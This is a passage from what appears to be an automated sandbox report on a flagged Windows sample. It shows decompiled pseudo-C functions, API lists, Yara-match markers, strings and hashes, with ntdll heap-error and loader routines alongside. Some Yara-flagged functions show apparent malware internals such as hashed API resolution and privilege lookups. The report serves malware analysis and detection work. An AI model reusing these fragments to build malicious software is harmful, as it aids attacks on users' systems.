                                          				_t30 = __eflags;
                                          				_v68 = 0;
                                          				E0041B860( &_v67, 0, 0x3f);
                                          				E0041C400( &_v68, 3);
                                          				_t12 = E0040ACD0(_t30, _a4 + 0x1c,  &_v68); // executed
                                          				_t13 = E00414E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                          				_t25 = _t13;
                                          				if(_t25 != 0) {
                                          					_t21 = _a8;
                                          					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                          					_t32 = _t14;
                                          					if(_t14 == 0) {
                                          						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A460(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                          					}
                                          					return _t14;
                                          				}
                                          				return _t13;
                                          			}













                                          APIs
                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0041A070(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                          				char _t10;
                                          
                                          				_t3 = _a4 + 0xc74; // 0xc74
                                          				E0041A960(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                          				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                          				return _t10;
                                          			}





                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0041A030(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                          				void* _t10;
                                          
                                          				E0041A960(_a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                          				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                          				return _t10;
                                          			}





                                          APIs
                                          • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0041A1D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                          				int _t10;
                                          
                                          				E0041A960(_a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                          				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                          				return _t10;
                                          			}





                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0041A0B0(intOrPtr _a4, int _a8) {
                                          
                                          				_t5 = _a4;
                                          				E0041A960(_a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                          				ExitProcess(_a8);
                                          			}




                                          APIs
                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Strings
                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 00FCB53F
                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 00FCB47D
                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 00FCB352
                                          • *** then kb to get the faulting stack, xrefs: 00FCB51C
                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 00FCB2F3
                                          • a NULL pointer, xrefs: 00FCB4E0
                                          • *** enter .exr %p for the exception record, xrefs: 00FCB4F1
                                          • This failed because of error %Ix., xrefs: 00FCB446
                                          • *** Inpage error in %ws:%s, xrefs: 00FCB418
                                          • *** enter .cxr %p for the context, xrefs: 00FCB50D
                                          • *** An Access Violation occurred in %ws:%s, xrefs: 00FCB48F
                                          • Go determine why that thread has not released the critical section., xrefs: 00FCB3C5
                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00FCB38F
                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 00FCB314
                                          • The instruction at %p referenced memory at %p., xrefs: 00FCB432
                                          • The resource is owned shared by %d threads, xrefs: 00FCB37E
                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 00FCB476
                                          • The instruction at %p tried to %s , xrefs: 00FCB4B6
                                          • <unknown>, xrefs: 00FCB27E, 00FCB2D1, 00FCB350, 00FCB399, 00FCB417, 00FCB48E
                                          • an invalid address, %p, xrefs: 00FCB4CF
                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 00FCB2DC
                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 00FCB484
                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 00FCB39B
                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 00FCB305
                                          • The critical section is owned by thread %p., xrefs: 00FCB3B9
                                          • The resource is owned exclusively by thread %p, xrefs: 00FCB374
                                          • read from, xrefs: 00FCB4AD, 00FCB4B2
                                          • write to, xrefs: 00FCB4A6
                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 00FCB323
                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00FCB3D6
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • API String ID: 0-108210295
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 44%
                                          			E00FD1C06() {
                                          				signed int _t27;
                                          				char* _t104;
                                          				char* _t105;
                                          				intOrPtr _t113;
                                          				intOrPtr _t115;
                                          				intOrPtr _t117;
                                          				intOrPtr _t119;
                                          				intOrPtr _t120;
                                          
                                          				_t105 = 0xef48a4;
                                          				_t104 = "HEAP: ";
                                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          					_push(_t104);
                                          					E00F1B150();
                                          				} else {
                                          					E00F1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          				}
                                          				_push( *0x100589c);
                                          				E00F1B150("Heap error detected at %p (heap handle %p)\n",  *0x10058a0);
                                          				_t27 =  *0x1005898; // 0x0
                                          				if(_t27 <= 0xf) {
                                          					switch( *((intOrPtr*)(_t27 * 4 +  &M00FD1E96))) {
                                          						case 0:
                                          							_t105 = "heap_failure_internal";
                                          							goto L21;
                                          						case 1:
                                          							goto L21;
                                          						case 2:
                                          							goto L21;
                                          						case 3:
                                          							goto L21;
                                          						case 4:
                                          							goto L21;
                                          						case 5:
                                          							goto L21;
                                          						case 6:
                                          							goto L21;
                                          						case 7:
                                          							goto L21;
                                          						case 8:
                                          							goto L21;
                                          						case 9:
                                          							goto L21;
                                          						case 0xa:
                                          							goto L21;
                                          						case 0xb:
                                          							goto L21;
                                          						case 0xc:
                                          							goto L21;
                                          						case 0xd:
                                          							goto L21;
                                          						case 0xe:
                                          							goto L21;
                                          						case 0xf:
                                          							goto L21;
                                          					}
                                          				}
                                          				L21:
                                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          					_push(_t104);
                                          					E00F1B150();
                                          				} else {
                                          					E00F1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          				}
                                          				_push(_t105);
                                          				E00F1B150("Error code: %d - %s\n",  *0x1005898);
                                          				_t113 =  *0x10058a4; // 0x0
                                          				if(_t113 != 0) {
                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          						_push(_t104);
                                          						E00F1B150();
                                          					} else {
                                          						E00F1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          					}
                                          					E00F1B150("Parameter1: %p\n",  *0x10058a4);
                                          				}
                                          				_t115 =  *0x10058a8; // 0x0
                                          				if(_t115 != 0) {
                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          						_push(_t104);
                                          						E00F1B150();
                                          					} else {
                                          						E00F1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          					}
                                          					E00F1B150("Parameter2: %p\n",  *0x10058a8);
                                          				}
                                          				_t117 =  *0x10058ac; // 0x0
                                          				if(_t117 != 0) {
                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          						_push(_t104);
                                          						E00F1B150();
                                          					} else {
                                          						E00F1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          					}
                                          					E00F1B150("Parameter3: %p\n",  *0x10058ac);
                                          				}
                                          				_t119 =  *0x10058b0; // 0x0
                                          				if(_t119 != 0) {
                                          					L41:
                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          						_push(_t104);
                                          						E00F1B150();
                                          					} else {
                                          						E00F1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          					}
                                          					_push( *0x10058b4);
                                          					E00F1B150("Last known valid blocks: before - %p, after - %p\n",  *0x10058b0);
                                          				} else {
                                          					_t120 =  *0x10058b4; // 0x0
                                          					if(_t120 != 0) {
                                          						goto L41;
                                          					}
                                          				}
                                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          					_push(_t104);
                                          					E00F1B150();
                                          				} else {
                                          					E00F1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          				}
                                          				return E00F1B150("Stack trace available at %p\n", 0x10058c0);
                                          			}












                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                          • API String ID: 0-2897834094
                                          • Opcode ID: 0ea75f4086b2fe9dbf43766bbdf153364322b76b14daa17c7d47bff9d0a819dc
                                          • Instruction ID: 9fdbeec20b39a7441a1f9fd753a38adca8aa3e00551d3ffae41411836a61df4a
                                          • Opcode Fuzzy Hash: 0ea75f4086b2fe9dbf43766bbdf153364322b76b14daa17c7d47bff9d0a819dc
                                          • Instruction Fuzzy Hash: C0619337A65148FFD3119744E855A7173A6F704B30B1D846BF8097B392C7299C80BF0A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 25%
                                          			E00416CA2(void* __eax, signed int __ecx, signed int* __edx, void* _a12, void* _a16) {
                                          				void* _v4;
                                          				void* _v8;
                                          				void* _v10;
                                          				void* _v12;
                                          				void* _v16;
                                          				void* _v20;
                                          				void* _v28;
                                          				void* _v32;
                                          				void* _v36;
                                          
                                          				asm("pushfd");
                                          				_push(__ecx);
                                          				asm("cmpsb");
                                          				if((__ecx &  *__edx) == 0) {
                                          					return __eax;
                                          				}
                                          			}













                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: $: $: $Host$Host: $Unknown
                                          • API String ID: 0-3527920956
                                          • Opcode ID: c89c686980f7eeb1925ce282541595de24a89ff96f5f67bb685b01c6bcff3b65
                                          • Instruction ID: 944afdcdccf46707a009b214d5038d72688a15774cbc245a584524b340340fc0
                                          • Opcode Fuzzy Hash: c89c686980f7eeb1925ce282541595de24a89ff96f5f67bb685b01c6bcff3b65
                                          • Instruction Fuzzy Hash: E431C2B6900208AAD710DF88CC82FEBB768EF89304F04456AFD189B245D775A644C7F5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 96%
                                          			E00F23D34(signed int* __ecx) {
                                          				signed int* _v8;
                                          				char _v12;
                                          				signed int* _v16;
                                          				signed int* _v20;
                                          				char _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				char _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				signed int* _v48;
                                          				signed int* _v52;
                                          				signed int _v56;
                                          				signed int _v60;
                                          				char _v68;
                                          				signed int _t140;
                                          				signed int _t161;
                                          				signed int* _t236;
                                          				signed int* _t242;
                                          				signed int* _t243;
                                          				signed int* _t244;
                                          				signed int* _t245;
                                          				signed int _t255;
                                          				void* _t257;
                                          				signed int _t260;
                                          				void* _t262;
                                          				signed int _t264;
                                          				void* _t267;
                                          				signed int _t275;
                                          				signed int* _t276;
                                          				short* _t277;
                                          				signed int* _t278;
                                          				signed int* _t279;
                                          				signed int* _t280;
                                          				short* _t281;
                                          				signed int* _t282;
                                          				short* _t283;
                                          				signed int* _t284;
                                          				void* _t285;
                                          
                                          				_v60 = _v60 | 0xffffffff;
                                          				_t280 = 0;
                                          				_t242 = __ecx;
                                          				_v52 = __ecx;
                                          				_v8 = 0;
                                          				_v20 = 0;
                                          				_v40 = 0;
                                          				_v28 = 0;
                                          				_v32 = 0;
                                          				_v44 = 0;
                                          				_v56 = 0;
                                          				_t275 = 0;
                                          				_v16 = 0;
                                          				if(__ecx == 0) {
                                          					_t280 = 0xc000000d;
                                          					_t140 = 0;
                                          					L50:
                                          					 *_t242 =  *_t242 | 0x00000800;
                                          					_t242[0x13] = _t140;
                                          					_t242[0x16] = _v40;
                                          					_t242[0x18] = _v28;
                                          					_t242[0x14] = _v32;
                                          					_t242[0x17] = _t275;
                                          					_t242[0x15] = _v44;
                                          					_t242[0x11] = _v56;
                                          					_t242[0x12] = _v60;
                                          					return _t280;
                                          				}
                                          				if(E00F21B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                          					_v56 = 1;
                                          					if(_v8 != 0) {
                                          						L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                          					}
                                          					_v8 = _t280;
                                          				}
                                          				if(E00F21B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                          					_v60 =  *_v8;
                                          					L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                          					_v8 = _t280;
                                          				}
                                          				if(E00F21B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                          					L16:
                                          					if(E00F21B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                          						L28:
                                          						if(E00F21B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                          							L46:
                                          							_t275 = _v16;
                                          							L47:
                                          							_t161 = 0;
                                          							L48:
                                          							if(_v8 != 0) {
                                          								L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                          							}
                                          							_t140 = _v20;
                                          							if(_t140 != 0) {
                                          								if(_t275 != 0) {
                                          									L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                          									_t275 = 0;
                                          									_v28 = 0;
                                          									_t140 = _v20;
                                          								}
                                          							}
                                          							goto L50;
                                          						}
                                          						_t167 = _v12;
                                          						_t255 = _v12 + 4;
                                          						_v44 = _t255;
                                          						if(_t255 == 0) {
                                          							_t276 = _t280;
                                          							_v32 = _t280;
                                          						} else {
                                          							_t276 = L00F34620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                          							_t167 = _v12;
                                          							_v32 = _t276;
                                          						}
                                          						if(_t276 == 0) {
                                          							_v44 = _t280;
                                          							_t280 = 0xc0000017;
                                          							goto L46;
                                          						} else {
                                          							E00F5F3E0(_t276, _v8, _t167);
                                          							_v48 = _t276;
                                          							_t277 = E00F61370(_t276, 0xef4e90);
                                          							_pop(_t257);
                                          							if(_t277 == 0) {
                                          								L38:
                                          								_t170 = _v48;
                                          								if( *_v48 != 0) {
                                          									E00F5BB40(0,  &_v68, _t170);
                                          									if(L00F243C0( &_v68,  &_v24) != 0) {
                                          										_t280 =  &(_t280[0]);
                                          									}
                                          								}
                                          								if(_t280 == 0) {
                                          									_t280 = 0;
                                          									L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                          									_v44 = 0;
                                          									_v32 = 0;
                                          								} else {
                                          									_t280 = 0;
                                          								}
                                          								_t174 = _v8;
                                          								if(_v8 != 0) {
                                          									L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                          								}
                                          								_v8 = _t280;
                                          								goto L46;
                                          							}
                                          							_t243 = _v48;
                                          							do {
                                          								 *_t277 = 0;
                                          								_t278 = _t277 + 2;
                                          								E00F5BB40(_t257,  &_v68, _t243);
                                          								if(L00F243C0( &_v68,  &_v24) != 0) {
                                          									_t280 =  &(_t280[0]);
                                          								}
                                          								_t243 = _t278;
                                          								_t277 = E00F61370(_t278, 0xef4e90);
                                          								_pop(_t257);
                                          							} while (_t277 != 0);
                                          							_v48 = _t243;
                                          							_t242 = _v52;
                                          							goto L38;
                                          						}
                                          					}
                                          					_t191 = _v12;
                                          					_t260 = _v12 + 4;
                                          					_v28 = _t260;
                                          					if(_t260 == 0) {
                                          						_t275 = _t280;
                                          						_v16 = _t280;
                                          					} else {
                                          						_t275 = L00F34620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                          						_t191 = _v12;
                                          						_v16 = _t275;
                                          					}
                                          					if(_t275 == 0) {
                                          						_v28 = _t280;
                                          						_t280 = 0xc0000017;
                                          						goto L47;
                                          					} else {
                                          						E00F5F3E0(_t275, _v8, _t191);
                                          						_t285 = _t285 + 0xc;
                                          						_v48 = _t275;
                                          						_t279 = _t280;
                                          						_t281 = E00F61370(_v16, 0xef4e90);
                                          						_pop(_t262);
                                          						if(_t281 != 0) {
                                          							_t244 = _v48;
                                          							do {
                                          								 *_t281 = 0;
                                          								_t282 = _t281 + 2;
                                          								E00F5BB40(_t262,  &_v68, _t244);
                                          								if(L00F243C0( &_v68,  &_v24) != 0) {
                                          									_t279 =  &(_t279[0]);
                                          								}
                                          								_t244 = _t282;
                                          								_t281 = E00F61370(_t282, 0xef4e90);
                                          								_pop(_t262);
                                          							} while (_t281 != 0);
                                          							_v48 = _t244;
                                          							_t242 = _v52;
                                          						}
                                          						_t201 = _v48;
                                          						_t280 = 0;
                                          						if( *_v48 != 0) {
                                          							E00F5BB40(_t262,  &_v68, _t201);
                                          							if(L00F243C0( &_v68,  &_v24) != 0) {
                                          								_t279 =  &(_t279[0]);
                                          							}
                                          						}
                                          						if(_t279 == 0) {
                                          							L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                          							_v28 = _t280;
                                          							_v16 = _t280;
                                          						}
                                          						_t202 = _v8;
                                          						if(_v8 != 0) {
                                          							L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                          						}
                                          						_v8 = _t280;
                                          						goto L28;
                                          					}
                                          				}
                                          				_t214 = _v12;
                                          				_t264 = _v12 + 4;
                                          				_v40 = _t264;
                                          				if(_t264 == 0) {
                                          					_v20 = _t280;
                                          				} else {
                                          					_t236 = L00F34620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                          					_t280 = _t236;
                                          					_v20 = _t236;
                                          					_t214 = _v12;
                                          				}
                                          				if(_t280 == 0) {
                                          					_t161 = 0;
                                          					_t280 = 0xc0000017;
                                          					_v40 = 0;
                                          					goto L48;
                                          				} else {
                                          					E00F5F3E0(_t280, _v8, _t214);
                                          					_t285 = _t285 + 0xc;
                                          					_v48 = _t280;
                                          					_t283 = E00F61370(_t280, 0xef4e90);
                                          					_pop(_t267);
                                          					if(_t283 != 0) {
                                          						_t245 = _v48;
                                          						do {
                                          							 *_t283 = 0;
                                          							_t284 = _t283 + 2;
                                          							E00F5BB40(_t267,  &_v68, _t245);
                                          							if(L00F243C0( &_v68,  &_v24) != 0) {
                                          								_t275 = _t275 + 1;
                                          							}
                                          							_t245 = _t284;
                                          							_t283 = E00F61370(_t284, 0xef4e90);
                                          							_pop(_t267);
                                          						} while (_t283 != 0);
                                          						_v48 = _t245;
                                          						_t242 = _v52;
                                          					}
                                          					_t224 = _v48;
                                          					_t280 = 0;
                                          					if( *_v48 != 0) {
                                          						E00F5BB40(_t267,  &_v68, _t224);
                                          						if(L00F243C0( &_v68,  &_v24) != 0) {
                                          							_t275 = _t275 + 1;
                                          						}
                                          					}
                                          					if(_t275 == 0) {
                                          						L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                          						_v40 = _t280;
                                          						_v20 = _t280;
                                          					}
                                          					_t225 = _v8;
                                          					if(_v8 != 0) {
                                          						L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                          					}
                                          					_v8 = _t280;
                                          					goto L16;
                                          				}
                                          			}

                                          Strings
                                          • Kernel-MUI-Number-Allowed, xrefs: 00F23D8C
                                          • Kernel-MUI-Language-Disallowed, xrefs: 00F23E97
                                          • Kernel-MUI-Language-SKU, xrefs: 00F23F70
                                          • WindowsExcludedProcs, xrefs: 00F23D6F
                                          • Kernel-MUI-Language-Allowed, xrefs: 00F23DC0
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                          • API String ID: 0-258546922
                                          • Opcode ID: 556bb974310fbde98b618669a1ff8b21542c3b975d1739de5764262843b11b35
                                          • Instruction ID: 3a0b2f4843530aab9b9e7ff2c804b63564518bd42e251d16d80dee3018f2d8ca
                                          • Opcode Fuzzy Hash: 556bb974310fbde98b618669a1ff8b21542c3b975d1739de5764262843b11b35
                                          • Instruction Fuzzy Hash: 69F1A1B2D00628EFCB11DF98D981AEEBBB9FF48750F14006AE905E7251D7749E05EB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 83%
                                          			E00F28794(void* __ecx) {
                                          				signed int _v0;
                                          				char _v8;
                                          				signed int _v12;
                                          				void* _v16;
                                          				signed int _v20;
                                          				intOrPtr _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v40;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				intOrPtr* _t77;
                                          				signed int _t80;
                                          				signed char _t81;
                                          				signed int _t87;
                                          				signed int _t91;
                                          				void* _t92;
                                          				void* _t94;
                                          				signed int _t95;
                                          				signed int _t103;
                                          				signed int _t105;
                                          				signed int _t110;
                                          				signed int _t118;
                                          				intOrPtr* _t121;
                                          				intOrPtr _t122;
                                          				signed int _t125;
                                          				signed int _t129;
                                          				signed int _t131;
                                          				signed int _t134;
                                          				signed int _t136;
                                          				signed int _t143;
                                          				signed int* _t147;
                                          				signed int _t151;
                                          				void* _t153;
                                          				signed int* _t157;
                                          				signed int _t159;
                                          				signed int _t161;
                                          				signed int _t166;
                                          				signed int _t168;
                                          
                                          				_push(__ecx);
                                          				_t153 = __ecx;
                                          				_t159 = 0;
                                          				_t121 = __ecx + 0x3c;
                                          				if( *_t121 == 0) {
                                          					L2:
                                          					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                          					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                          						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                          						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                          						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                          							L6:
                                          							if(E00F2934A() != 0) {
                                          								_t159 = E00F9A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                          								__eflags = _t159;
                                          								if(_t159 < 0) {
                                          									_t81 =  *0x1005780; // 0x0
                                          									__eflags = _t81 & 0x00000003;
                                          									if((_t81 & 0x00000003) != 0) {
                                          										_push(_t159);
                                          										E00F95510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                          										_t81 =  *0x1005780; // 0x0
                                          									}
                                          									__eflags = _t81 & 0x00000010;
                                          									if((_t81 & 0x00000010) != 0) {
                                          										asm("int3");
                                          									}
                                          								}
                                          							}
                                          						} else {
                                          							_t159 = E00F2849B(0, _t122, _t153, _t159, _t180);
                                          							if(_t159 >= 0) {
                                          								goto L6;
                                          							}
                                          						}
                                          						_t80 = _t159;
                                          						goto L8;
                                          					} else {
                                          						_t125 = 0x13;
                                          						asm("int 0x29");
                                          						_push(0);
                                          						_push(_t159);
                                          						_t161 = _t125;
                                          						_t87 =  *( *[fs:0x30] + 0x1e8);
                                          						_t143 = 0;
                                          						_v40 = _t161;
                                          						_t118 = 0;
                                          						_push(_t153);
                                          						__eflags = _t87;
                                          						if(_t87 != 0) {
                                          							_t118 = _t87 + 0x5d8;
                                          							__eflags = _t118;
                                          							if(_t118 == 0) {
                                          								L46:
                                          								_t118 = 0;
                                          							} else {
                                          								__eflags =  *(_t118 + 0x30);
                                          								if( *(_t118 + 0x30) == 0) {
                                          									goto L46;
                                          								}
                                          							}
                                          						}
                                          						_v32 = 0;
                                          						_v28 = 0;
                                          						_v16 = 0;
                                          						_v20 = 0;
                                          						_v12 = 0;
                                          						__eflags = _t118;
                                          						if(_t118 != 0) {
                                          							__eflags = _t161;
                                          							if(_t161 != 0) {
                                          								__eflags =  *(_t118 + 8);
                                          								if( *(_t118 + 8) == 0) {
                                          									L22:
                                          									_t143 = 1;
                                          									__eflags = 1;
                                          								} else {
                                          									_t19 = _t118 + 0x40; // 0x40
                                          									_t156 = _t19;
                                          									E00F28999(_t19,  &_v16);
                                          									__eflags = _v0;
                                          									if(_v0 != 0) {
                                          										__eflags = _v0 - 1;
                                          										if(_v0 != 1) {
                                          											goto L22;
                                          										} else {
                                          											_t128 =  *(_t161 + 0x64);
                                          											__eflags =  *(_t161 + 0x64);
                                          											if( *(_t161 + 0x64) == 0) {
                                          												goto L22;
                                          											} else {
                                          												E00F28999(_t128,  &_v12);
                                          												_t147 = _v12;
                                          												_t91 = 0;
                                          												__eflags = 0;
                                          												_t129 =  *_t147;
                                          												while(1) {
                                          													__eflags =  *((intOrPtr*)(0x1005c60 + _t91 * 8)) - _t129;
                                          													if( *((intOrPtr*)(0x1005c60 + _t91 * 8)) == _t129) {
                                          														break;
                                          													}
                                          													_t91 = _t91 + 1;
                                          													__eflags = _t91 - 5;
                                          													if(_t91 < 5) {
                                          														continue;
                                          													} else {
                                          														_t131 = 0;
                                          														__eflags = 0;
                                          													}
                                          													L37:
                                          													__eflags = _t131;
                                          													if(_t131 != 0) {
                                          														goto L22;
                                          													} else {
